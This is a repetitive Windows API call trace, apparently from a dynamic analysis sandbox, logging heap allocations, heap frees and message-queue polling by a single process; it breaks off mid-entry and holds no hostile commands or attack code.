HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0177.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0177.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0177.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.136] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.137] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0177.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0177.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.140] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.143] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.143] HeapFree (in: 